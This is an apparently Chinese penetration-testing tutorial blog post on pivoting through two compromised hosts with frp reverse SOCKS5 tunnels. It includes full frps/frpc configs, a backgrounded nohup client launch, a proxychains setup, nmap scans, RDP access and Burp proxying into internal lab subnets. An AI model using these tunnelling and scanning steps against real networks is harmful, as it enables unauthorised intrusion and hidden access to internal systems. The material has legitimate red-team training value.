frp通过socks5二层代理,访问内网三层网站
最新推荐文章于 2024-03-06 21:44:28 发布
星球守护者
最新推荐文章于 2024-03-06 21:44:28 发布
阅读量4.5k
收藏
21
点赞数
5
最新推荐文章于 2024-03-06 21:44:28 发布
阅读量4.5k
收藏
21
点赞数
5
文章目录
- 0x01背景介绍
- 0x02 frp一层代理(反向)
- 服务端(server)
- 客户端 (client)
- 0x03 frp二层代理
- 客户端 (client)
- 0x04 测试连接
- 摘抄
0x01背景介绍
假设:已经获取边界服务器(192.168.0.100)的服务器权限,win7服务器(192.168.52.30)的权限
实现:
- 配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络(
192.168.52.30) - 配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络(
192.168.93.30) - 现在 ubuntu(web1)要充当
frp客户端和frp服务端,以便访问第三层网络
0x02 frp一层代理(反向)
服务端(server)
kali(192.168.0.107)
frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini
客户端 (client)
ubuntu-web1(192.168.0.100)
会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,
我们访问vps的7777端口就相当于访问客户端的7000端口
frpc.ini
---------------------
[common]
server_addr = 192.168.0.107
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
----------------------
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
先启动服务器,在启动客户端
0x03 frp二层代理
同时启动二层代理的服务端frps
ubuntu-web1(192.168.0.100)
frps.ini
--------------------------------------
[common]
#服务端监听端口,默认7000。监听来自客户端的流量请求
bind_addr = 192.168.52.10
bind_port = 7000
--------------------------------------
启动
chmod +777 frps
./frps -c ./frps.ini
客户端 (client)
web-pc1(192.168.52.30)
会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,
我们访问vps的7777端口就相当于访问客户端的7000端口
frpc.ini
---------------------
[common]
server_addr = 192.168.52.10
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
----------------------
启动
chmod +777 frpc
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
0x04 测试连接
kali本地添加proxy配置
vim /etc/proxychains4.conf
----------------------------------
socks5 192.168.0.107 7777
socks5 192.168.52.10 7777
----------------------------------
第一步 通过代理,使用nmap进行扫描
扫描二层网络
proxychains nmap -Pn -sT -sV -F -O 192.168.52.30
扫描三层网络
proxychains nmap -Pn -sT -sV -F -O 192.168.93.40
第二步 远程连接
proxychains rdesktop 192.168.52.30
proxychains rdesktop 192.168.93.40
第三步 浏览器开启代理,访问内网系统
访问二层网络
socks5 127.0.0.1 7777
http://192.168.52.30:8080/
访问三层网络
启动burp:
proxychains burpsuite
firfox代理:
socks5 127.0.0.1 7777
http 127.0.0.1 8080
访问网站:
http://192.168.52.30:8080/
127.0.0.1:7777--firxfox:8080---192.168.52.10:7777---burp127.0.0.0:8080----发送
使用代理启动burp
浏览器开启burp代理
成功访问
查看后台burp的代理包
摘抄
历尽千帆,归来仍是少年。经受风雨,坦荡而真诚,温暖而坚韧。
在生活里,明明白白做人,在工作上,勤勤恳恳努力。
不做玻璃心的花瓶,保持韧性,勤奋、坚持,用一颗真诚的心面对生活,才是一个人走向成功,能够屹立不倒的原因。
804
企业员工
到【灌水乐园】发言
小波995: 这个好,勾选了scaling设置之后,重启,再按照博主的方法去调字号就可以随便调,字体也可以不用换成楷体
开心利索打代码: 大大,想问一下,这个是更改过的标准格式吗?还是就是从endnote上面下载那两个呀
普通网友: 每当我阅读你的编程博客文章时,我总能感受到你的专业水平和耐心解答的精神。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】
也许明天_Martina: 那个是怎么导入到excel的呀
2401_83573706: 纯数字四位有人吗